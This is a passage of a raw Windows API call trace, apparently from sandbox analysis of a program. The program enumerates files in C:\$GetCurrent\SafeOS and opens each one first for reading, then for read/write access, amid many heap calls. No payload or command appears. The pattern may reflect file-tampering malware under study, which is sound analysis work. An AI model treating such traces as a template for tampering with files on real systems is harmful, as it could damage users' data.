(lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0059.882] GetFileType (hFile=0x410) returned 0x1 [0059.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0059.882] CloseHandle (hObject=0x410) returned 1 [0059.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0059.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0059.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0059.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0059.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0059.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0059.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0059.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0059.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0059.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0059.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0059.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0059.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0059.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0059.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0059.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0059.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0059.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0059.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0059.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0059.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0059.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0059.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0059.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0059.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0059.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0059.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0059.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0059.883] AreFileApisANSI () returned 1 [0059.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0059.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67540 [0059.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=41 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 41 [0059.883] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9568f13f, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9568f13f, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x232c8)) returned 1 [0059.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0059.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0059.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0059.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0059.883] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.883] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.883] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956819aa, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x956819aa, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x9c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="GetCurrentRollback.ini", cAlternateFileName="GETCUR~1.INI")) returned 1 [0059.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0059.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0059.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0059.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0059.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0059.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0059.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0059.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0059.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0059.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0059.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0059.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0059.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0059.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0059.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0059.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0059.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0059.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0059.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0059.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0059.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0059.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0059.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0059.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0059.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0059.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0059.884] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.884] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.884] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.884] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0059.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0059.884] AreFileApisANSI () returned 1 [0059.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini", lpUsedDefaultChar=0x0) returned 45 [0059.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0059.884] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.884] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0059.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0059.884] AreFileApisANSI () returned 1 [0059.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0059.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x715b8 [0059.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=45 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 45 [0059.885] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0059.886] GetFileType (hFile=0x410) returned 0x1 [0059.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0059.887] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0059.887] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0059.887] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0059.887] CloseHandle (hObject=0x410) returned 1 [0059.887] AreFileApisANSI () returned 1 [0059.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0059.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71ca0 [0059.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=45 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 45 [0059.888] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0059.888] GetFileType (hFile=0x410) returned 0x1 [0059.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0059.888] CloseHandle (hObject=0x410) returned 1 [0059.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0059.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0059.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885e0 [0059.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0059.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885e0 | out: hHeap=0x20000) returned 1 [0059.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0059.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0059.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0059.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0059.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0059.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0059.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0059.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0059.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0059.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0059.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0059.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0059.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0059.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0059.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0059.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0059.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0059.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0059.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0059.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0059.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0059.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0059.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0059.889] AreFileApisANSI () returned 1 [0059.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0059.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x715b8 [0059.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=45 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 45 [0059.889] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956819aa, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x956819aa, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x9c)) returned 1 [0059.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0059.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0059.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0059.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0059.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.889] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x54acc791, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0x54acc791, ftLastWriteTime.dwHighDateTime=0x1d3273a, nFileSizeHigh=0x0, nFileSizeLow=0x241, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="PartnerSetupComplete.cmd", cAlternateFileName="PARTNE~1.CMD")) returned 1 [0059.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0059.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0059.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0059.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0059.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0059.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0059.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0059.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0059.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0059.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0059.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0059.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0059.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0059.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0059.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0059.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0059.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0059.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0059.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0059.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0059.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0059.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0059.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0059.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0059.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0059.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0059.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0059.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0059.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0059.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0059.890] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.890] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.890] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.890] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0059.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0059.890] AreFileApisANSI () returned 1 [0059.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd", lpUsedDefaultChar=0x0) returned 47 [0059.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0059.890] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.890] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0059.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0059.890] AreFileApisANSI () returned 1 [0059.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0059.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71b68 [0059.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x71b68, cchWideChar=47 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 47 [0059.891] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0059.891] GetFileType (hFile=0x410) returned 0x1 [0059.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0059.891] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0059.891] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0059.891] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0059.891] CloseHandle (hObject=0x410) returned 1 [0059.891] AreFileApisANSI () returned 1 [0059.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0059.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71688 [0059.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=47 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 47 [0059.892] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0059.892] GetFileType (hFile=0x410) returned 